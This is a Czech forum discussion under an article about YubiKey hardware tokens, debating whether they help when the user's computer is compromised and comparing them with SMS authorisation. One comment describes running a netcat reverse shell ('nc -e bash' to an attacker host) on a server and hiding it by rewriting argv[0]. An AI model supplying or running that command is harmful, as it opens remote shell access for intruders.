Yubikey. Co to je a co to umí (1) (diskuse)

Možná mi něco uniká, ale není mi jasné, jak takový token může cokoli garantovat, pokud předpokládáme, že samotný počítač je pod kontrolou útočníka. V tu chvíli je totiž i můj systém MITM a jediné co ovládám já je ten token.

29.4.2016 21:12 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Afaik ani tvůrci ani já jsme nikde nepsali, že ti může cokoliv garantovat. Je to pouze spolehlivější metoda dvoufaktorové autentizace.

blog.rfox.eu

29.4.2016 21:49 karelI
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

V tom případě jsem asi nepochopil odstavec "K čemu?". Jestliže si útočník s mým mobilem a kompem může dělat co chce, tak první co udělá je, že tuto ochranu odpojí. Pouze mu stačí, aby mě udržoval v iluzi, že je to stále chráněné. Čili ve skutečnosti to nepřidává ke spolehlivosti vůbec nic, jen to uživateli komplikuje život (a v té iluzi nějaké vyšší bezpečnosti ho to udržuje vlastně už od počátku).

29.4.2016 21:58 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Jo, to jsi fakt nepochopil.

Pokud ochranu odpojí, tak je mu to k ničemu. Tohle není ochrana počítače, to je ochrana tvých účtů a hesel. Ochrana nespočívá v software, ale právě v tom hardware, který vyžaduje fyzicky rukou zmáčknout hardwarové tlačítko na tom tokenu. Hesla však nikdy neopouštějí token, maximálně co útočník může je zachytit jeden OTP string, což potom řeší práve GPG v režimu smartcardy, kdy nezachytí nic, protože klíč nikdy neopouští token.

blog.rfox.eu

29.4.2016 22:48 karelI
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Jenže tohle všechno předpokládá, že ty účty jsou na ten token nějak napojeny. První co útočník udělá je, že tuto vazbu zruší a je po všem. K tomu bude potřebovat, abys mu ten token parkrát zmáčknul, ale to není problém, když má vše pod kontrolou. Takže ten token je k ničemu, když máš hacknutý systém a tedy ani nevíš, co vlastně podepisuješ. Když nad tim tak přemýšlím, vlastně ani není potřeba rušit tu vazbu. To že nevíš co podepisuješ úplně stačí, jen je to trochu pomalejší.

30.4.2016 11:08 Filip Jirsák
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Mohl byste rozvinout, jak si ten útok představujete? Dejme tomu, že OTP hesla používám k přihlášení ke vzdálenému serveru přes SSH. Pokud se budu přihlašovat jenom heslem, stačí útočníkovi odposlechnout heslo a může se přihlásit mým jménem, kdy ho napadne. Pokud budu používat přihlášení klíčem uloženým na disku, stačí útočníkovi získat klíč a heslo k němu, a opět se může přihlásit, kdy ho napadne. Útočník, který má plně v moci můj počítač, obojí zvládne. Ale jak si představujete útok na ten token? Útočník, který má plně v moci můj počítač, samozřejmě kdykoli může převzít navázané spojení, to je ale princip toho, že má v moci počítač, a není před tím vůbec žádná obrana.

30.4.2016 11:33 karelI
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Vlastně jste to popsal. Útočník převezme spojení, na server si hodí svůj privátní klíč (nebo cokoli co ho tam pustí) a token je ze hry. Obávám se, že pro něj bylo snažší token obejít než pro vás ho nastavit. A vy nadále žijete v blaženém pocitu, že musíte zmáčknout tlačítko :-)

Prostě článek měl mít motivaci spíš takovou - jsme paranoidní, máme napadený mobil i komp, takže útočník si může dělat co chce. Tak to hodíme za hlavu a budem se zabývat hračkou, která s tím vůbec nesouvisí, komplikuje nám postupy, ale vypadá to strašně cool :-)

30.4.2016 11:55 pavele
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Mohl bys popsat převzetí navázaného spojení u OpenSSH s klíči? Pokud vím, v okamžiku zasahování do komunikace SSH dojde automaticky k ukončení spojení.

Spíše mi připadá, že se snažíte, aby tyto technologie nikdo nepoužíval. Díky, pro mne to znamená, že fungují.

30.4.2016 14:04 karelI
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Opravdu chceš, abych ti vysvětloval, jak převzít spojení u systému, který mám pod kontrolou? Tedy včetně všech binárek atd.

Pouze zkouším, jestli ta motivace z článku je platná. Bohužel až příliš často se setkávám s tím, že se někdo snaží bezpečnost zvýšit způsobem, který pouze komplikuje použití, ale nezlepšuje nic. Jeden z osvědčených kritických postupů je se prostě snažit se být tím útočníkem a najít v úvaze chybu.

Druhá část tvého příspěvku je s prominutím neuvěřitelný mentální veletoč. Opravdu to bereš tak, že snaha o nalezení chyby v systému je pro tebe důkazem, že systém je bez chyby? Co na to říct...

2.5.2016 08:29 Xerces
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Nj. Bohužel se to neděje jenom v oblasti IT, ale i v jiných oblastech, například zabezpečení dopravy. Kde se vyšší bezpečnosti snaží docílit přidáváním dalších a dalších prvků, které sami o sobě třeba fungují perfektně, ale v širším kontextu jsou spíše kontraproduktivní. :-/

30.4.2016 15:20 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Vlastně jste to popsal. Útočník převezme spojení, na server si hodí svůj privátní klíč (nebo cokoli co ho tam pustí) a token je ze hry. Obávám se, že pro něj bylo snažší token obejít než pro vás ho nastavit. A vy nadále žijete v blaženém pocitu, že musíte zmáčknout tlačítko

Token je ze hry pro jeden server. Útočník tím nezíská přístupy do banky, k šifrovaným gpg souborům, ke githubu a dalším webům a já můžu začít řešit kompromitaci. Jak jsem psal, není to dokonalé řešení, jen lepší dvoufaktorová autentizace. Nebo ta ti přijde taky úplně zbytečná?

blog.rfox.eu

30.4.2016 16:19 Filip Jirsák
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

To ovšem předpokládáte, že já jako uživatel mám možnost na vzdáleném serveru tu OTP autentizaci vypnout, navíc nepozorovaně. Neřekl bych, že OTP s bezpečností nijak nesouvisí, nebo že je to komplikované. Nedovedu si představit, že bych se třeba do elektronického bankovnictví přihlašoval pevným heslem.

1.5.2016 09:59 Cobolak
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

To "vypnutie" nemusi byt uplne odstranenie. Staci na vzdialenom stroji spustit backdoor ako nc -e bash utocnikov.stroj. Pri prepisani argv[0] si toho vsimne malokto. Na poslanie prikazu mi stacia vlastnosti X, netreba sa ani hrabat v zdrojakoch ssh.

1.5.2016 11:41 Filip Jirsák
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

V případě přihlašování přes SSH k obyčejnému serveru je to možné. V případě přihlašování k webmailu nebo internetovému bankovnictví je „staci na vzdialenom stroji spustit backdoor“ mimo realitu.

8.5.2016 01:15 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Tak stačí převzít mým suprtrupr tokenem autentifikované a navázané spojení a odeslat peníze, ne? Co dalšího bych měl s tím bankovnictvím chtít dělat? Takže x let nošení, hledání a mačkání nějaké cypoviny a ve finále zase prázdný účet. Stejně jako Maruna, která neumí napsat SMSku a v IB měla heslo hovnokleslo. Dvoufaktorová autorizace prostřednictvím mobilu je IMHO více jak 120% řešení. Zbytek jsou vyhozené peníze a další opruz, co musím sebou nosit, když stejně většinu průniků do IB mají debilové, co vyplňují dotazníky přijaté emailem a píšou do nich i svůj PIN.

fuck the cola, fuck the pizza, all you need is slivovitza

8.5.2016 13:33 hz
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

A ja myslel, ze 100 % je maximum ;)

8.5.2016 15:05 pavlix | skóre: 54 | blog: pavlix
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

To bych mu neříkal. Takhle je aspoň na první pohled jasné, že ho má člověk ignorovat.

Já už tu vlastně ani nejsem. Abclinuxu umřelo.

9.5.2016 02:25 kyknos | skóre: 18 | blog: Quid novi? | Ranša Rosa
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

cože?

už jsem slyšel, že je ph=0 minimum, 80 °F dvakrát teplejší než 40 °F, a že kytkám měří papání v luxech, ale že by 100% bylo maximum, to jsem ještě neslyšel

So the Nationalists and the Socialists have the same policy on Brexit. They should get together and form a...

9.5.2016 19:55 hz
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Nepsal jsem, ze 100% je maximum, ale ze 100 % je maximum.

9.5.2016 21:09 kyknos | skóre: 18 | blog: Quid novi? | Ranša Rosa
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Obojí je stejný nesmysl.

So the Nationalists and the Socialists have the same policy on Brexit. They should get together and form a...

9.5.2016 23:17 k3dAR | skóre: 63
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

tak % je zlomek ze 100, ale jasne, vetsi polovina z nas to porad nechape :)

porad nemam telo, ale uz mam hlavu... nobody

10.5.2016 01:58 kyknos | skóre: 18 | blog: Quid novi? | Ranša Rosa
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

a 200/100 není zlomek? jedno jablko je maximum? ta maturita z matiky je potreba jako sul, koukam

So the Nationalists and the Socialists have the same policy on Brexit. They should get together and form a...

10.5.2016 11:58 k3dAR | skóre: 63
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

proc by 200/100 nebyl zlomek? ti hrabe? je to zlomek ze 100, jak sem psal :) jablko ne, maximum je jeden kyknos, bejt tu dva tak uz to tu cele zkolabuje, maturitu z matiky sem mel za 1, diky za optani, ovsem ty jsi asi z psychologie delal reparat ;)

porad nemam telo, ale uz mam hlavu... nobody

11.5.2016 13:12 kyknos | skóre: 18 | blog: Quid novi? | Ranša Rosa
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

pokud někdo tvrdi, ze 100% nebo 100 % je maximum, tak asi nechape, ze 200/100 je zlomek

z psychologie mam 1 i ze statnic :)

So the Nationalists and the Socialists have the same policy on Brexit. They should get together and form a...

11.5.2016 15:32 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Jestli jsi nikdy nesplnil plán na 120 %, tak jsi houby a né soudruh.

fuck the cola, fuck the pizza, all you need is slivovitza

12.5.2016 00:00 hz
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Inu dobra, rozepiseme si to. Reakce byla na 120% reseni. Reseni chapu tak, ze kdyz je vyreseno, je to tech 100 procent. Nedava mi tedy smysl mit vic.

A to ze nejsem soudruh, to je naprosto v poradku a jsem za to rad ;-)

Jo a pardon, ze jsem krmil ten trolici komentar a svinil tak diskuzi.

13.5.2016 00:34 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Jseš tak blbej, nebo si na to jenom hraješ? Úkol/problém - vydělat na brigádě tisíc korun. Řešení - vydělám 1200 korun. Splnil jsem plán? Na 120%

ty budeš z těch, co nechápou, proč 1+1 = 1, že?

fuck the cola, fuck the pizza, all you need is slivovitza

16.5.2016 09:53 prcamo
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

asi nejakej menezer

10.5.2016 09:37 Filip Jirsák
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Mám účet pouze u takových bank, kterým k odeslání peněz nestačí, že jsem přihlášen na svůj účet, ale požadují autorizaci každé platby.

8.5.2016 01:10 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Nedovedu si představit, že bych se třeba do elektronického bankovnictví přihlašoval pevným heslem.

A proč? Mám to tak asi 10 let. 10 let stejné heslo (naprosto jednoduché, slovníkové). Nezmizela mi ani koruna. Na paranoiu pomáhají prášky, ne tokeny :-)

fuck the cola, fuck the pizza, all you need is slivovitza

8.5.2016 15:06 pavlix | skóre: 54 | blog: pavlix
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Obávám se, že bezpečnost nezávisí na tom, zda se vám ztratila koruna.

Já už tu vlastně ani nejsem. Abclinuxu umřelo.

10.5.2016 09:40 Filip Jirsák
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

To, že vám nezmizela ani koruna, neznamená, že je to bezpečné.

11.5.2016 15:29 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

To prakticky dokazuje, že to bezpečné je. Naopak, to, že si myslím, že je to bezpečné neznamená, že mi někdo nevybere účet. Pokud bych si měl vybrat, raději bych zvolil nezabezpečený účet, na kterém peníze zůstanou :-)

Ale to je možná tím, že mám raději praxi, než rozjímání nad kouskem hovna.

fuck the cola, fuck the pizza, all you need is slivovitza

11.5.2016 22:03 pavlix | skóre: 54 | blog: pavlix
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Ale to je možná tím, že mám raději praxi, než rozjímání nad kouskem hovna.

Tak proč mám z toho, co píšeš přesně opačný dojem?

Já už tu vlastně ani nejsem. Abclinuxu umřelo.

13.5.2016 00:38 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Protože rád rozjímáš a slovíčkaříš... :-)

Nad čím si doplň sám... :-)

Celá tahle diskuze je o bezpečnosti, která neexistuje, takže je vlastně o ... Bezpečné je jenom to, že všichni umřeme.

fuck the cola, fuck the pizza, all you need is slivovitza

30.4.2016 11:15 Raketa
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Přesně tak. Je dobré nežít v iluzi nějaké super bezpečnosti díky tomu, že mám nějaký artefakt, který mě omezuje. Token musí mít vlastní display a klávesnici, aby bylo jasné co dělá a co dělám já. Je nesmysl řešit u yubikey scan pod el. mikroskopem, když je tu mnohem jednoduší vektor a bez fyz. přístupu.

30.4.2016 15:17 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Ehm, co by měl dělat, když je to jednoúčelové zařízení, které prostě nic jiného neumí? Jak by ti v tomhle pomohl displej a klávesnice. Navíc yubikey v podstatě displej a klávesnici má - je tam jedna ledka, která začne blikat když chce GPG heslo a jedno tlačítko fungující ve dvou režimech (krátký a dlouhý dotek).

blog.rfox.eu

8.5.2016 11:46 Zopper | skóre: 15
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Problém je třeba v elektronickém bankovnictví, když mi malware pod rukama změní informace o platbě, co právě posílám. V takový okamžik čekám, že budu generovat OTP, ale zatímco na mobilu mi v sms přijde číslo cílového účtu a částka, a já si můžu ověřit, že mezi klávesnicí a bankou nedošlo ke změně, u Yubikey podepisuju prázdný papír a jen doufám, že mi útočník nepodstrčil k podpisu něco jiného.

Mobil má zase riziko toho, že bude taky napadnutý... (Ale můžeme si být jisti, že neexistuje nějaký vektor na Yubikey?) Člověk si nevybere, no.

"Dlouho ještě chcete soudit proti právu, stranit svévolníkům?" Ž 82,2

8.5.2016 14:09 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Já bych to viděl jako doplněk, ne jako úplnou náhradu a kompletní řešení. To by se asi dalo jen jak jsem psal, kdyby měl člověk přímo v mozku podporu asymetrického šifrování.

blog.rfox.eu

29.4.2016 21:58 veveričkaplešatá
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

keby ste sa rozpisali radsej o tom ako sa prihlasit cez ten kluc do pocitaca tak ako aj root a ako aj user , ako to nakonfigurovat a podobne vsade sa pisu len same omacky ale to podstatne je vzdy vynechane ... bol by som povdacny ako to potom bude prihlasovat a podobne , ako si to generuje heslo ktore pouzije nabuduce a tak ako sa vlasne pomocou toho klucu prihlasim do PC to mna zaujma a nie nejake google a podobne cloud sluzby ... zial je to tak . Dakujem .

29.4.2016 22:03 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Jak jsem psal dál, budou ještě další díly (rozkouskovala to redakce, ne já). V nich se řeší použití s GPG (jak ho kompletně rozchodit, vygenerovat klíče, nastavit PINy a tak) a použití pro SSH (privátní klíč je pak v tokenu). Neřeším tam přihlášení do počítače, ale to je v podstatě stejné, jako to SSH, jen to chce říct linuxu (PAM modul) aby se přes GPG spojil s tím tokenem. Není vyloučeno, že o tom já, nebo někdo jiný potom ještě napíše další info, ale zatím jsem neměl potřebu to nastavovat.

blog.rfox.eu

30.4.2016 09:55 pavele
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Stačí se podívat do sekce Hardware -> Příslušenství -> Podle sběrnice -> USB -> Kryptografická zařízení -> YubiKey NEO. Tam jsem popsal, jak jsem si token nastavoval já. Zbytek máš zde nebo zde.

30.4.2016 15:31 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

YubiKey NEO.

Dobré. Ten další díl článku bude podobný.

blog.rfox.eu

Jak to bylo v těch pelíškách? Teda, to muselo dát hrozný práce... přitom taková blbost :-D

Hračky navozující pocit kybernetické bezpečnosti dneska ještě někdo kupuje? Hoši, ušetřete tisícovku a zajděte si radši na pivo a za holkama :-)

)

fuck the cola, fuck the pizza, all you need is slivovitza

5.5.2016 23:52 pavlix | skóre: 54 | blog: pavlix
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

To nejsou hračky navozující pocit bezpečnosti, ale kryptografické tokeny. Umožňují mimojiné zcela oddělit uložení klíčů od počítače, což se může hodit. Navíc to nejsou žádné drahé hračky, aspoň pokud nejde o individuální objednávku jednoho kusu. Za holkama je lepší chodit bez peněz, člověk aspoň o tolik nepřijde. Na pivo stačí pár drobných.

Já už tu vlastně ani nejsem. Abclinuxu umřelo.

7.5.2016 09:10 Michal Kubeček | skóre: 72 | Luštěnice
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Ani při individuální objednávce jednoho kusu to není až tak drahé. Yubikey 4 se dá v ČR pořídit za 1162 Kč včetně DPH, to už jsem utratil víc za větší blbosti.

7.5.2016 23:37 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Umožňují mimojiné zcela oddělit uložení klíčů od počítače, což se může hodit.

Co to je jsem si přečetl. Ale k čemu to je? Kromě toho, že by se to někdy mohlo hodit? Prakticky...? Já v tom prakticky vidím jenom opruz, že abych se dostal do systému, budu muset po baráku hledat nějakou 3.14čovinu právě ve chvíli, kdy se mi nechce ani pohnout. Připadá mi to jako nahrazovat kódový zámek do prosklených dveří obrovskou kladkou na dvoukilový litionvý klíč, abych ve finále zůstal stát jak opařený před šutrem rozbitými skleněnými dveřmi se slovy : WTF? S kamenem jsem ve svém paranoidním scénáři nepočítal, to bylo moc jednoduché :-D

Můj názor je, že každé takové řešení zatěžuje jenom jeho majitele :-)

Chápal bych to u systému, který běží offline a jediným rozhraním je klávesnice a USBčko. Čili mi to aspoň urychlí login. Prostě zmáčknu tlačítko a je to.

Přesto nechápu, proč kupovat nějakou předraženou kravinu, když se to beztak dá spíchnout na nějakém arduinu za 2USD.

fuck the cola, fuck the pizza, all you need is slivovitza

8.5.2016 00:19 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Když tě tak čtu, tak mi dochází, že jsem těmi články odvedl špatnou práci, protože jsi to vůbec nepochopil. Marně přemýšlím, jestli jsem selhal u popisu yubikeye, nebo obecně tokenů. Možná jsem měl přidat nějaké obrázky s UML sequence diagramama. Nejspíš jsem to měl přečíst někoho totálně BFU, abych věděl, jak moc věcí jsem předpokládal jako implicitní znalost a případně je vysvětlit.

blog.rfox.eu

8.5.2016 01:25 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Napsal jsi to moc hezky, ale popsal jsi věc, kterou dávno mám a nosím sebou - mobil. Ta zvládne to samé. Že se dá napadnout? Ano, to dá. Token se dá ukrást. Jaká je pravděpodobnost? Přibližně stejná. Takže? To nepřináší nic navíc, jenom další krám a výdaje.

Prakticky - kolikrát se ti někdo dostal do systému a napadl další stroje? A z druhé strany - kolikrát se ti někdo dostal do systému, protože v komponentě byla nezalátaná díra, kterou útočník zneužil?

IB ? mám sms autorizaci - čili OK Webmail ? Zapomenu 3.14čovinu doma na stole a nepříhlásím se do mailu? Hmm, výborná fičura. Takže si nastavím ještě jednorázové heslo? Kdo to podporuje? Normální heslo? Jsem kde jsem byl.

Nějaký další argument, proč by si to kdokoliv jiný, než paranoik, nebo sběratel HW měl koupit? Jako je to hezké, ale to třeba parní stroj taky. Mám rád technické věci, ale tohle mi moc připomíná USB flash disk na to, abych to musel mít ve vitrýnce :-)

fuck the cola, fuck the pizza, all you need is slivovitza

8.5.2016 01:34 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

A z druhé strany - kolikrát se ti někdo dostal do systému, protože v komponentě byla nezalátaná díra, kterou útočník zneužil?

Nice try, FBI.

blog.rfox.eu

9.5.2016 02:22 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Nerozumím řeči tvého kmene.

fuck the cola, fuck the pizza, all you need is slivovitza